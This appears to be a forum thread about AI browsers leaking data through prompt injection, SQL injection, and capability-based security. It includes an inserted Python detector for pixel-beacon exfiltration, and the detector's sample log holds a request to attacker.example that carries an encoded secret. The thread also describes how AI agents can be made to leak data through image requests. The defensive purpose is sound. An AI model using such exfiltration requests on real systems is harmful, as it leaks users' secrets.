How does Perplexity Comet and Dia not suffer from data leakage like this? They seem to completely violate the lethal trifecta principle and intermix your entire browser history, scraped web page data and LLMs.
do_not_redeem · 19m ago
Because nobody has tried attacking them
Yet
Or have they? How would you find out? Have you been auditing your outgoing network requests for 1x1 pixel images with query strings in the URL?
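The outgoing-request audit suggested above, as an added example that is not part of the thread: it parses a few constructed proxy log lines (the field layout is an assumption) and flags tiny image fetches whose query string carries a long, high-entropy value, which is the shape a pixel-beacon exfiltration takes.

```python
# Added example (not from the thread): flag outgoing requests for tiny-image
# URLs whose query string may be carrying exfiltrated data.
import math
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines; assumed layout:
# "<timestamp> <client> <method> <url> <status> <response-bytes>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 GET https://cdn.example.com/site.css 200 8123
2024-05-01T10:00:02Z 10.0.0.5 GET https://img.example.com/logo.png?v=3 200 4096
2024-05-01T10:00:03Z 10.0.0.5 GET https://attacker.example/pixel.gif?d=U2VjcmV0IGFwaSBrZXk6IHNrLWxpdmUtYWJjZGVm 200 43
2024-05-01T10:00:04Z 10.0.0.5 GET https://analytics.example.net/t.png?uid=7f3a9b2c4d5e6f7081929394a5b6c7d8 200 43
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".webp")


def shannon_entropy(s: str) -> float:
    """Bits per character: encoded secrets score high, plain words score low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def suspicious_beacons(log_text: str, max_bytes: int = 100,
                       min_value_len: int = 20, min_entropy: float = 3.5) -> list[dict]:
    """Return small image requests whose query carries a long, high-entropy value."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        ts, client, _method, url, _status, size = m.groups()
        parts = urlsplit(url)
        # A tracking pixel is an image with a tiny response body.
        if not parts.path.lower().endswith(IMAGE_EXT) or int(size) > max_bytes:
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            ent = shannon_entropy(value)
            if len(value) >= min_value_len and ent >= min_entropy:
                hits.append({"time": ts, "client": client, "host": parts.hostname,
                             "param": key, "value_len": len(value), "entropy": round(ent, 2)})
    return hits


if __name__ == "__main__":
    for hit in suspicious_beacons(SAMPLE_LOG):
        print(hit)
```

A legitimate analytics ID looks the same as an exfiltrated blob, so the hits are triage input: compare the destination host against the set of trackers you expect rather than treating every hit as a leak.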
pryelluw · 1h ago
I'm still fixing sql and db command injection through APIs from juniors and now vibe coders. This just adds more work to do.
The ITT/TTI and TTS/STT have been particularly annoying to protect against. I don’t feel we’ve matured enough to have solid protections against such vectors yet.
wglb · 50m ago
Write a prompt that asks to detect sql injection in each source code model. Or other security issues.
siisisbab · 46m ago
Why not just ask the original prompt to make no mistakes?
pixl97 · 22m ago
Because most of its training data is mistakes or otherwise insecure code?
hobs · 35m ago
Again, this is something most good linters will catch, Jetbrains stuff will absolutely just tell you, deterministically, that this is a scary concatenation of strings.
No reason to use a lossy method.
mikewarot · 1h ago
Maybe this will finally get people over the hump and adopt OSs based on capability based security. Being required to give a program a whitelist at runtime is almost foolproof, for current classes of fools.
yorwba · 43m ago
People will use the equivalent of audit2allow https://linux.die.net/man/1/audit2allow and not go the extra mile of defining fine-grained capabilities to reduce the attack surface to a minimum.
zahlman · 36m ago
Can I confidently (i.e. with reason to trust the source) install one today from boot media, expect my applications to just work, and have a proper GUI experience out of box?
mikewarot · 13m ago
No, and I'm surprised it hasn't happened by now. Genode was my hope for this, but they seem to be going away from a self hosting OS/development system.
Any application you've got assumes authority to access everything, and thus just won't work. I suppose it's possible that an OS could shim the dialog boxes for file selection, open, save, etc... and then transparently provide access to only those files, but that hasn't happened in the 5 years[1] I've been waiting. (Well, far more than that... here's 14 years ago[2])
This problem was solved back in the 1970s and early 80s... and we're now 40+ years out, still stuck trusting all the code we write.
"One of my weirder hobbies is helping coin or boost new terminology..." That is so fetch!
jgalt212 · 18m ago
Simon is a modern day Brooksley Born, and like her he's pushing back against forces much stronger than him.
scarface_74 · 1h ago
I have been skeptical from day one of using any Gen AI tool to produce output for systems meant for external use. I’ll use it to better understand input and then route to standard functions with the same security I would do for a backend for a website and have the function send deterministic output.
[1] https://news.ycombinator.com/item?id=25428345
[2] https://www.quora.com/What-is-the-most-important-question-or...